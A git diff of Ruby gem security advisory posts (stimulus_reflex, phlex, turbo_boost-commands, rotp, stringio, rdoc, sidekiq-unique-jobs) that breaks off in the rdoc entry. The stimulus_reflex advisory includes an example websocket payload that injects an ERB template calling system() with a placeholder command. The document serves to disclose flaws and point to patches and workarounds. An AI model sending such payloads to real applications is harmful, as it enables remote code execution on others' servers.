+title: 'CVE-2023-46950 (sidekiq-unique-jobs): Cross Site Scripting vulnerability in
+  Contribsys Sidekiq'
+comments: false
+categories:
+- sidekiq-unique-jobs
+advisory:
+  gem: sidekiq-unique-jobs
+  cve: 2023-46950
+  ghsa: fhx8-5c23-x7x5
+  url: https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
+  title: Cross Site Scripting vulnerability in Contribsys Sidekiq
+  date: 2024-03-01
+  description: |
+    Cross Site Scripting vulnerability in Contribsys Sidekiq v.6.5.8
+    allows a remote attacker to obtain sensitive information via a
+    crafted URL to the filter functions.
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 7.1.33"
+  - ">= 8.0.7"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-46950
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/security/advisories/GHSA-cmh9-rx85-xj38
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/releases/tag/v8.0.7
+    - https://www.mgm-sp.com/cve/sidekiq-unique-jobs-reflected-xss-cve-2023-46950-cve-2023-46951
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/pull/829
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/cd09ba6108f98973b6649a6149790c3d4502b4cc
+    - https://github.com/mhenrixon/sidekiq-unique-jobs/commit/ec3afd920c1b55843c72f748a87baac7f8be82ed
+    - https://github.com/advisories/GHSA-fhx8-5c23-x7x5
+---
diff --git a/advisories/_posts/2024-03-12-CVE-2024-28121.md b/advisories/_posts/2024-03-12-CVE-2024-28121.md
index ab704f56..37a9c479 100644
--- a/advisories/_posts/2024-03-12-CVE-2024-28121.md
+++ b/advisories/_posts/2024-03-12-CVE-2024-28121.md
@@ -1,100 +1,100 @@
----
-layout: advisory
-title: 'CVE-2024-28121 (stimulus_reflex): StimulusReflex arbitrary method call'
-comments: false
-categories:
-- stimulus_reflex
-advisory:
-  gem: stimulus_reflex
-  cve: 2024-28121
-  ghsa: f78j-4w3g-4q65
-  url: https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65
-  title: StimulusReflex arbitrary method call
-  date: 2024-03-12
-  description: |
-    ### Summary
-
-    More methods than expected can be called on reflex instances.
-    Being able to call some of them has security implications.
-
-    ### Details
-
-    To invoke a reflex a websocket message of the following shape is sent:
-
-    ```json
-    {
-      "target": "[class_name]#[method_name]",
-      "args": []
-    }
-    ```
-
-    The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`. It then attempts to call `method_name` on the instance with the provided arguments [ref]:
-
-    [ref]: https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83
-
-    ```ruby
-    method = reflex.method method_name
-    required_params = method.parameters.select { |(kind, _)| kind == :req }
-    optional_params = method.parameters.select { |(kind, _)| kind == :opt }
-
-    if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size
-      reflex.public_send(method_name, *arguments)
-    end
-    ```
-
-    This is problematic as `reflex.method(method_name)` can be more methods than those explicitly specified by the developer in their reflex class. A good example is the `instance_variable_set` method.
-
-    ```json
-    {
-      "target": "StimulusReflex::Reflex#render_collection",
-      "args": [
-        { "inline":  "<% system('[command here]') %>" }
-      ]
-    }
-    ```
-
-    ### Patches
-
-    Patches are available on [RubyGems] and on [NPM].
-
-    [RubyGems]: https://rubygems.org/gems/stimulus_reflex
-    [NPM]: https://npmjs.org/package/stimulus_reflex
-
-    The patched versions are:
-    - [`3.4.2`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2)
-    - [`3.5.0.rc4`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4)
-
-    ### Workaround
-
-    You can add this guard to mitigate the issue if running an unpatched
-    version of the library.
-    1.) Make sure all your reflexes inherit from the `ApplicationReflex`
-        class
-    2.) Add this `before_reflex` callback to your `app/reflexes/application_reflex.rb` file:
-
-    ```ruby
-    class ApplicationReflex < StimulusReflex::Reflex
-      before_reflex do
-        ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1]
-        allowed = ancestors.any? { |a| a.public_instance_methods(false).any?(method_name.to_sym) }
-
-        raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed
-      end
-    end
-    ```
-  cvss_v3: 8.8
-  patched_versions:
-  - "~> 3.4.2"
-  - ">= 3.5.0.rc4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-28121
-    - http://seclists.org/fulldisclosure/2024/Mar/16
-    - https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2
-    - https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4
-    - https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65
-    - https://github.com/stimulusreflex/stimulus_reflex/commit/538582d240439aab76066c72335ea92096cd0c7f
-    - https://github.com/stimulusreflex/stimulus_reflex/commit/d823d7348f9ca42eb6df25574f11974e4f5bc88c
-    - https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83
-    - https://github.com/advisories/GHSA-f78j-4w3g-4q65
----
+---
+layout: advisory
+title: 'CVE-2024-28121 (stimulus_reflex): StimulusReflex arbitrary method call'
+comments: false
+categories:
+- stimulus_reflex
+advisory:
+  gem: stimulus_reflex
+  cve: 2024-28121
+  ghsa: f78j-4w3g-4q65
+  url: https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65
+  title: StimulusReflex arbitrary method call
+  date: 2024-03-12
+  description: |
+    ### Summary
+
+    More methods than expected can be called on reflex instances.
+    Being able to call some of them has security implications.
+
+    ### Details
+
+    To invoke a reflex a websocket message of the following shape is sent:
+
+    ```json
+    {
+      "target": "[class_name]#[method_name]",
+      "args": []
+    }
+    ```
+
+    The server will proceed to instantiate `reflex` using the provided `class_name` as long as it extends `StimulusReflex::Reflex`. It then attempts to call `method_name` on the instance with the provided arguments [ref]:
+
+    [ref]: https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83
+
+    ```ruby
+    method = reflex.method method_name
+    required_params = method.parameters.select { |(kind, _)| kind == :req }
+    optional_params = method.parameters.select { |(kind, _)| kind == :opt }
+
+    if arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size
+      reflex.public_send(method_name, *arguments)
+    end
+    ```
+
+    This is problematic as `reflex.method(method_name)` can be more methods than those explicitly specified by the developer in their reflex class. A good example is the `instance_variable_set` method.
+
+    ```json
+    {
+      "target": "StimulusReflex::Reflex#render_collection",
+      "args": [
+        { "inline":  "<% system('[command here]') %>" }
+      ]
+    }
+    ```
+
+    ### Patches
+
+    Patches are available on [RubyGems] and on [NPM].
+
+    [RubyGems]: https://rubygems.org/gems/stimulus_reflex
+    [NPM]: https://npmjs.org/package/stimulus_reflex
+
+    The patched versions are:
+    - [`3.4.2`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2)
+    - [`3.5.0.rc4`](https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4)
+
+    ### Workaround
+
+    You can add this guard to mitigate the issue if running an unpatched
+    version of the library.
+    1.) Make sure all your reflexes inherit from the `ApplicationReflex`
+        class
+    2.) Add this `before_reflex` callback to your `app/reflexes/application_reflex.rb` file:
+
+    ```ruby
+    class ApplicationReflex < StimulusReflex::Reflex
+      before_reflex do
+        ancestors = self.class.ancestors[0..self.class.ancestors.index(StimulusReflex::Reflex) - 1]
+        allowed = ancestors.any? { |a| a.public_instance_methods(false).any?(method_name.to_sym) }
+
+        raise ArgumentError.new("Reflex method '#{method_name}' is not defined on class '#{self.class.name}' or on any of its ancestors") if !allowed
+      end
+    end
+    ```
+  cvss_v3: 8.8
+  patched_versions:
+  - "~> 3.4.2"
+  - ">= 3.5.0.rc4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28121
+    - http://seclists.org/fulldisclosure/2024/Mar/16
+    - https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.4.2
+    - https://github.com/stimulusreflex/stimulus_reflex/releases/tag/v3.5.0.rc4
+    - https://github.com/stimulusreflex/stimulus_reflex/security/advisories/GHSA-f78j-4w3g-4q65
+    - https://github.com/stimulusreflex/stimulus_reflex/commit/538582d240439aab76066c72335ea92096cd0c7f
+    - https://github.com/stimulusreflex/stimulus_reflex/commit/d823d7348f9ca42eb6df25574f11974e4f5bc88c
+    - https://github.com/stimulusreflex/stimulus_reflex/blob/0211cad7d60fe96838587f159d657e44cee51b9b/app/channels/stimulus_reflex/channel.rb#L83
+    - https://github.com/advisories/GHSA-f78j-4w3g-4q65
+---
diff --git a/advisories/_posts/2024-03-12-CVE-2024-28199.md b/advisories/_posts/2024-03-12-CVE-2024-28199.md
index 6bc7acc6..1c3bd47b 100644
--- a/advisories/_posts/2024-03-12-CVE-2024-28199.md
+++ b/advisories/_posts/2024-03-12-CVE-2024-28199.md
@@ -1,92 +1,92 @@
----
-layout: advisory
-title: 'CVE-2024-28199 (phlex): Cross-site Scripting (XSS) possible with maliciously
-  formed HTML attribute names and values in Phlex'
-comments: false
-categories:
-- phlex
-advisory:
-  gem: phlex
-  cve: 2024-28199
-  ghsa: 242p-4v39-2v8g
-  url: https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g
-  title: Cross-site Scripting (XSS) possible with maliciously formed HTML attribute
-    names and values in Phlex
-  date: 2024-03-12
-  description: |
-    There is a potential cross-site scripting (XSS) vulnerability that
-    can be exploited via maliciously crafted user data. This was due
-    to improper case-sensitivity in the code that was meant to prevent
-    these attacks.
-
-    ### Impact
-
-    If you render an `<a>` tag with an `href` attribute set to a
-    user-provided link, that link could potentially execute JavaScript
-    when clicked by another user.
-
-    ```ruby
-    a(href: user_profile) { "Profile" }
-    ```
-
-    If you splat user-provided attributes when rendering any HTML or
-    SVG tag, malicious event attributes could be included in the output,
-    executing JavaScript when the events are triggered by another user.
-
-    ```ruby
-    h1(**JSON.parse(user_attributes))
-    ```
-
-    ### Patches
-
-    Patches are [available on RubyGems](https://rubygems.org/gems/phlex)
-    for all `1.x` minor versions. The patched versions are:
-
-    - [1.9.1](https://rubygems.org/gems/phlex/versions/1.9.1)
-    - [1.8.2](https://rubygems.org/gems/phlex/versions/1.8.2)
-    - [1.7.1](https://rubygems.org/gems/phlex/versions/1.7.1)
-    - [1.6.2](https://rubygems.org/gems/phlex/versions/1.6.2)
-    - [1.5.2](https://rubygems.org/gems/phlex/versions/1.5.2)
-    - [1.4.1](https://rubygems.org/gems/phlex/versions/1.4.1)
-    - [1.3.3](https://rubygems.org/gems/phlex/versions/1.3.3)
-    - [1.2.2](https://rubygems.org/gems/phlex/versions/1.2.2)
-    - [1.1.1](https://rubygems.org/gems/phlex/versions/1.1.1)
-    - [1.0.1](https://rubygems.org/gems/phlex/versions/1.0.1)
-
-    If you are on `main`, it has been patched since
-    [`aa50c60`](https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1)
-
-    ### Workarounds
-
-    Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)
-    that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline)
-    would effectively prevent this vulnerability from being exploited.
-
-    ### References
-
-    In addition to upgrading to a patched version of Phlex, we strongly
-    recommend configuring a Content Security Policy header that does not
-    allow `unsafe-inline`. Here’s how you can configure a Content Security
-    Policy header in Rails.
-    https://guides.rubyonrails.org/security.html#content-security-policy-header
-  cvss_v3: 7.1
-  patched_versions:
-  - "~> 1.0.1"
-  - "~> 1.1.1"
-  - "~> 1.2.2"
-  - "~> 1.3.3"
-  - "~> 1.4.1"
-  - "~> 1.5.2"
-  - "~> 1.6.2"
-  - "~> 1.7.1"
-  - "~> 1.8.2"
-  - ">= 1.9.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-28199
-    - https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g
-    - https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1
-    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
-    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline
-    - https://github.com/advisories/GHSA-242p-4v39-2v8g
----
+---
+layout: advisory
+title: 'CVE-2024-28199 (phlex): Cross-site Scripting (XSS) possible with maliciously
+  formed HTML attribute names and values in Phlex'
+comments: false
+categories:
+- phlex
+advisory:
+  gem: phlex
+  cve: 2024-28199
+  ghsa: 242p-4v39-2v8g
+  url: https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g
+  title: Cross-site Scripting (XSS) possible with maliciously formed HTML attribute
+    names and values in Phlex
+  date: 2024-03-12
+  description: |
+    There is a potential cross-site scripting (XSS) vulnerability that
+    can be exploited via maliciously crafted user data. This was due
+    to improper case-sensitivity in the code that was meant to prevent
+    these attacks.
+
+    ### Impact
+
+    If you render an `<a>` tag with an `href` attribute set to a
+    user-provided link, that link could potentially execute JavaScript
+    when clicked by another user.
+
+    ```ruby
+    a(href: user_profile) { "Profile" }
+    ```
+
+    If you splat user-provided attributes when rendering any HTML or
+    SVG tag, malicious event attributes could be included in the output,
+    executing JavaScript when the events are triggered by another user.
+
+    ```ruby
+    h1(**JSON.parse(user_attributes))
+    ```
+
+    ### Patches
+
+    Patches are [available on RubyGems](https://rubygems.org/gems/phlex)
+    for all `1.x` minor versions. The patched versions are:
+
+    - [1.9.1](https://rubygems.org/gems/phlex/versions/1.9.1)
+    - [1.8.2](https://rubygems.org/gems/phlex/versions/1.8.2)
+    - [1.7.1](https://rubygems.org/gems/phlex/versions/1.7.1)
+    - [1.6.2](https://rubygems.org/gems/phlex/versions/1.6.2)
+    - [1.5.2](https://rubygems.org/gems/phlex/versions/1.5.2)
+    - [1.4.1](https://rubygems.org/gems/phlex/versions/1.4.1)
+    - [1.3.3](https://rubygems.org/gems/phlex/versions/1.3.3)
+    - [1.2.2](https://rubygems.org/gems/phlex/versions/1.2.2)
+    - [1.1.1](https://rubygems.org/gems/phlex/versions/1.1.1)
+    - [1.0.1](https://rubygems.org/gems/phlex/versions/1.0.1)
+
+    If you are on `main`, it has been patched since
+    [`aa50c60`](https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1)
+
+    ### Workarounds
+
+    Configuring a [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)
+    that does not allow [`unsafe-inline`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline)
+    would effectively prevent this vulnerability from being exploited.
+
+    ### References
+
+    In addition to upgrading to a patched version of Phlex, we strongly
+    recommend configuring a Content Security Policy header that does not
+    allow `unsafe-inline`. Here’s how you can configure a Content Security
+    Policy header in Rails.
+    https://guides.rubyonrails.org/security.html#content-security-policy-header
+  cvss_v3: 7.1
+  patched_versions:
+  - "~> 1.0.1"
+  - "~> 1.1.1"
+  - "~> 1.2.2"
+  - "~> 1.3.3"
+  - "~> 1.4.1"
+  - "~> 1.5.2"
+  - "~> 1.6.2"
+  - "~> 1.7.1"
+  - "~> 1.8.2"
+  - ">= 1.9.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28199
+    - https://github.com/phlex-ruby/phlex/security/advisories/GHSA-242p-4v39-2v8g
+    - https://github.com/phlex-ruby/phlex/commit/aa50c604cdee1d0ce7ef068a4c66cbd5d43f96a1
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy
+    - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy#unsafe-inline
+    - https://github.com/advisories/GHSA-242p-4v39-2v8g
+---
diff --git a/advisories/_posts/2024-03-15-CVE-2024-28181.md b/advisories/_posts/2024-03-15-CVE-2024-28181.md
index f058072e..5c85d355 100644
--- a/advisories/_posts/2024-03-15-CVE-2024-28181.md
+++ b/advisories/_posts/2024-03-15-CVE-2024-28181.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2024-28181 (turbo_boost-commands): TurboBoost Commands vulnerable to arbitrary
-  method invocation'
-comments: false
-categories:
-- turbo_boost-commands
-advisory:
-  gem: turbo_boost-commands
-  cve: 2024-28181
-  ghsa: mp76-7w5v-pr75
-  url: https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75
-  title: TurboBoost Commands vulnerable to arbitrary method invocation
-  date: 2024-03-15
-  description: |
-    ### Impact
-
-    TurboBoost Commands has existing protections in place to
-    guarantee that only public methods on Command classes can be invoked; however, the
-    existing checks aren't as robust as they should be. It's possible for a sophisticated
-    attacker to invoke more methods than should be permitted depending on the the strictness
-    of authorization checks that individual applications enforce. Being able to call
-    some of these methods can have security implications.
-
-    #### Details
-
-    Commands verify that the class must be a `Command` and that the method requested is
-    defined as a public method; however, this isn't robust enough to guard against all
-    unwanted code execution. The library should more strictly enforce which methods are
-    considered safe before allowing them to be executed.
-
-    ### Patches
-
-    Patched in the following versions.
-    - 0.1.3
-      - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.1.3)
-      - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.1.3)
-    - 0.2.2
-      - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.2.2)
-      - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.2.2)
-
-    ### Workarounds
-
-    You can add this guard to mitigate the issue if running an unpatched
-    version of the library.
-
-    ```ruby
-    class ApplicationCommand < TurboBoost::Commands::Command
-      before_command do
-        method_name = params[:name].include?(\"#\") ? params[:name].split(\"#\").last : :perform
-        ancestors = self.class.ancestors[0..self.class.ancestors.index(TurboBoost::Commands::Command) - 1]
-        allowed = ancestors.any? { |a| a.public_instance_methods(false).any? method_name.to_sym }
-        throw :abort unless allowed # ← blocks invocation
-        # raise \"Invalid Command\" unless allowed # ← blocks invocation
-      end
-    end
-    ```
-  cvss_v3: 8.1
-  patched_versions:
-  - "~> 0.1.3"
-  - ">= 0.2.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-28181
-    - https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75
-    - https://github.com/hopsoft/turbo_boost-commands/commit/337cda7d9222f1f449905454a7374222017a7477
-    - https://github.com/hopsoft/turbo_boost-commands/commit/88af4fc0ac39cc1799d16c49fab52f6dfbcec9ba
-    - https://github.com/advisories/GHSA-mp76-7w5v-pr75
----
+---
+layout: advisory
+title: 'CVE-2024-28181 (turbo_boost-commands): TurboBoost Commands vulnerable to arbitrary
+  method invocation'
+comments: false
+categories:
+- turbo_boost-commands
+advisory:
+  gem: turbo_boost-commands
+  cve: 2024-28181
+  ghsa: mp76-7w5v-pr75
+  url: https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75
+  title: TurboBoost Commands vulnerable to arbitrary method invocation
+  date: 2024-03-15
+  description: |
+    ### Impact
+
+    TurboBoost Commands has existing protections in place to
+    guarantee that only public methods on Command classes can be invoked; however, the
+    existing checks aren't as robust as they should be. It's possible for a sophisticated
+    attacker to invoke more methods than should be permitted depending on the the strictness
+    of authorization checks that individual applications enforce. Being able to call
+    some of these methods can have security implications.
+
+    #### Details
+
+    Commands verify that the class must be a `Command` and that the method requested is
+    defined as a public method; however, this isn't robust enough to guard against all
+    unwanted code execution. The library should more strictly enforce which methods are
+    considered safe before allowing them to be executed.
+
+    ### Patches
+
+    Patched in the following versions.
+    - 0.1.3
+      - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.1.3)
+      - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.1.3)
+    - 0.2.2
+      - [NPM Package](https://www.npmjs.com/package/@turbo-boost/commands/v/0.2.2)
+      - [Ruby GEM](https://rubygems.org/gems/turbo_boost-commands/versions/0.2.2)
+
+    ### Workarounds
+
+    You can add this guard to mitigate the issue if running an unpatched
+    version of the library.
+
+    ```ruby
+    class ApplicationCommand < TurboBoost::Commands::Command
+      before_command do
+        method_name = params[:name].include?(\"#\") ? params[:name].split(\"#\").last : :perform
+        ancestors = self.class.ancestors[0..self.class.ancestors.index(TurboBoost::Commands::Command) - 1]
+        allowed = ancestors.any? { |a| a.public_instance_methods(false).any? method_name.to_sym }
+        throw :abort unless allowed # ← blocks invocation
+        # raise \"Invalid Command\" unless allowed # ← blocks invocation
+      end
+    end
+    ```
+  cvss_v3: 8.1
+  patched_versions:
+  - "~> 0.1.3"
+  - ">= 0.2.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28181
+    - https://github.com/hopsoft/turbo_boost-commands/security/advisories/GHSA-mp76-7w5v-pr75
+    - https://github.com/hopsoft/turbo_boost-commands/commit/337cda7d9222f1f449905454a7374222017a7477
+    - https://github.com/hopsoft/turbo_boost-commands/commit/88af4fc0ac39cc1799d16c49fab52f6dfbcec9ba
+    - https://github.com/advisories/GHSA-mp76-7w5v-pr75
+---
diff --git a/advisories/_posts/2024-03-18-CVE-2024-28862.md b/advisories/_posts/2024-03-18-CVE-2024-28862.md
index b6744823..f6fc513f 100644
--- a/advisories/_posts/2024-03-18-CVE-2024-28862.md
+++ b/advisories/_posts/2024-03-18-CVE-2024-28862.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2024-28862 (rotp): ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb
-  files.'
-comments: false
-categories:
-- rotp
-advisory:
-  gem: rotp
-  cve: 2024-28862
-  ghsa: x2h8-qmj4-g62f
-  url: https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f
-  title: ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb files.
-  date: 2024-03-18
-  description: |
-    The Ruby One Time Password library (ROTP) is an open source library
-    for generating and validating one time passwords. Affected versions
-    had overly permissive default permissions. Users should patch to
-    version 6.3.0. Users unable to patch may correct file permissions
-    after installation.
-  cvss_v3: 5.3
-  unaffected_versions:
-  - "< 6.2.1"
-  patched_versions:
-  - ">= 6.3.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-28862
-    - https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f
-    - https://github.com/advisories/GHSA-x2h8-qmj4-g62f
----
+---
+layout: advisory
+title: 'CVE-2024-28862 (rotp): ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb
+  files.'
+comments: false
+categories:
+- rotp
+advisory:
+  gem: rotp
+  cve: 2024-28862
+  ghsa: x2h8-qmj4-g62f
+  url: https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f
+  title: ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb files.
+  date: 2024-03-18
+  description: |
+    The Ruby One Time Password library (ROTP) is an open source library
+    for generating and validating one time passwords. Affected versions
+    had overly permissive default permissions. Users should patch to
+    version 6.3.0. Users unable to patch may correct file permissions
+    after installation.
+  cvss_v3: 5.3
+  unaffected_versions:
+  - "< 6.2.1"
+  patched_versions:
+  - ">= 6.3.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28862
+    - https://github.com/mdp/rotp/security/advisories/GHSA-x2h8-qmj4-g62f
+    - https://github.com/advisories/GHSA-x2h8-qmj4-g62f
+---
diff --git a/advisories/_posts/2024-03-21-CVE-2024-27280.md b/advisories/_posts/2024-03-21-CVE-2024-27280.md
index 0642ff12..220fc7e3 100644
--- a/advisories/_posts/2024-03-21-CVE-2024-27280.md
+++ b/advisories/_posts/2024-03-21-CVE-2024-27280.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2024-27280 (stringio): Buffer overread vulnerability in StringIO'
-comments: false
-categories:
-- stringio
-advisory:
-  gem: stringio
-  cve: 2024-27280
-  ghsa: v5h6-c2hv-hv3r
-  url: https://www.ruby-lang.org/en/news/2024/03/21/buffer-overread-cve-2024-27280/
-  title: Buffer overread vulnerability in StringIO
-  date: 2024-03-21
-  description: |
-    An issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x
-    through 3.0.6 and 3.1.x through 3.1.4.
-
-    The `ungetbyte` and `ungetc` methods on a StringIO can read past the end of a
-    string, and a subsequent call to `StringIO.gets` may return the memory value.
-
-    This vulnerability is not affected StringIO 3.0.3 and later, and Ruby 3.2.x
-    and later.
-
-    We recommend to update the StringIO gem to version 3.0.3 or later. In order to
-    ensure compatibility with bundled version in older Ruby series, you may update
-    as follows instead:
-
-    * For Ruby 3.0 users: Update to `stringio` 3.0.1.1
-    * For Ruby 3.1 users: Update to `stringio` 3.0.1.2
-
-    You can use `gem update stringio` to update it. If you are using bundler,
-    please add `gem "stringio", ">= 3.0.1.2"` to your `Gemfile`.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 3.0.1.1"
----
+---
+layout: advisory
+title: 'CVE-2024-27280 (stringio): Buffer overread vulnerability in StringIO'
+comments: false
+categories:
+- stringio
+advisory:
+  gem: stringio
+  cve: 2024-27280
+  ghsa: v5h6-c2hv-hv3r
+  url: https://www.ruby-lang.org/en/news/2024/03/21/buffer-overread-cve-2024-27280/
+  title: Buffer overread vulnerability in StringIO
+  date: 2024-03-21
+  description: |
+    An issue was discovered in StringIO 3.0.1, as distributed in Ruby 3.0.x
+    through 3.0.6 and 3.1.x through 3.1.4.
+
+    The `ungetbyte` and `ungetc` methods on a StringIO can read past the end of a
+    string, and a subsequent call to `StringIO.gets` may return the memory value.
+
+    This vulnerability is not affected StringIO 3.0.3 and later, and Ruby 3.2.x
+    and later.
+
+    We recommend to update the StringIO gem to version 3.0.3 or later. In order to
+    ensure compatibility with bundled version in older Ruby series, you may update
+    as follows instead:
+
+    * For Ruby 3.0 users: Update to `stringio` 3.0.1.1
+    * For Ruby 3.1 users: Update to `stringio` 3.0.1.2
+
+    You can use `gem update stringio` to update it. If you are using bundler,
+    please add `gem "stringio", ">= 3.0.1.2"` to your `Gemfile`.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 3.0.1.1"
+---
diff --git a/advisories/_posts/2024-03-21-CVE-2024-27281.md b/advisories/_posts/2024-03-21-CVE-2024-27281.md
index c41bc7c4..d5cd01bc 100644
--- a/advisories/_posts/2024-03-21-CVE-2024-27281.md
+++ b/advisories/_posts/2024-03-21-CVE-2024-27281.md
@@ -1,43 +1,43 @@
----
-layout: advisory
-title: 'CVE-2024-27281 (rdoc): RCE vulnerability with .rdoc_options in RDoc'
-comments: false
-categories:
-- rdoc
-advisory:
-  gem: rdoc
-  cve: 2024-27281
-  ghsa: 592j-995h-p23j
-  url: https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/
-  title: RCE vulnerability with .rdoc_options in RDoc
-  date: 2024-03-21
-  description: |
-    An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby
-    3.x through 3.3.0.
-
-    When parsing `.rdoc_options` (used for configuration in RDoc) as a YAML file,
-    object injection and resultant remote code execution are possible because
-    there are no restrictions on the classes that can be restored.
-
-    When loading the documentation cache, object injection and resultant remote
-    code execution are also possible if there were a crafted cache.
-
-    We recommend to update the RDoc gem to version 6.6.3.1 or later. In order to
-    ensure compatibility with bundled version in older Ruby series, you may
-    update as follows instead:
-
-    * For Ruby 3.0 users: Update to `rdoc` 6.3.4.1
-    * For Ruby 3.1 users: Update to `rdoc` 6.4.1.1
-    * For Ruby 3.2 users: Update to `rdoc` 6.5.1.1
-
-    You can use `gem update rdoc` to update it. If you are using bundler, please
-    add `gem "rdoc", ">= 6.6.3.1"` to your `Gemfile`.
-
-    Note: 6.3.4, 6.4.1, 6.5.1 and 6.6.3 have a incorrect fix. We recommend to
-    upgrade 6.3.4.1, 6.4.1.1, 6.5.1.1 and 6.6.3.1 instead of them.
-  cvss_v3: 4.5
-  patched_versions:
-  - "~> 6.3.4, >= 6.3.4.1"
-  - "~> 6.4.1, >= 6.4.1.1"
-  - ">=  6.5.1.1"
----
+---
+layout: advisory
+title: 'CVE-2024-27281 (rdoc): RCE vulnerability with .rdoc_options in RDoc'
+comments: false
+categories:
+- rdoc
+advisory:
+  gem: rdoc
+  cve: 2024-27281
+  ghsa: 592j-995h-p23j
+  url: https://www.ruby-lang.org/en/news/2024/03/21/rce-rdoc-cve-2024-27281/
+  title: RCE vulnerability with .rdoc_options in RDoc
+  date: 2024-03-21
+  description: |
+    An issue was discovered in RDoc 6.3.3 through 6.6.2, as distributed in Ruby
+    3.x through 3.3.0.
+
+    When parsing `.rdoc_options` (used for configuration in RDoc) as a YAML file,
+    object injection and resultant remote code execution are possible because
+    there are no restrictions on the classes that can be restored.
+
+    When loading the documentation cache, object injection and resultant remote
+    code execution are also possible if there were a crafted cache.
+
+    We recommend to update the RDoc gem to version 6.6.3.1 or later. In order to
+    ensure compatibility with bundled version in older Ruby series, you may
+    update as follows instead:
+
+    * For Ruby 3.0 users: Update to `rdoc` 6.3.4.1
+    * For Ruby 3.1 users: Update to `rdoc` 6.4.1.1
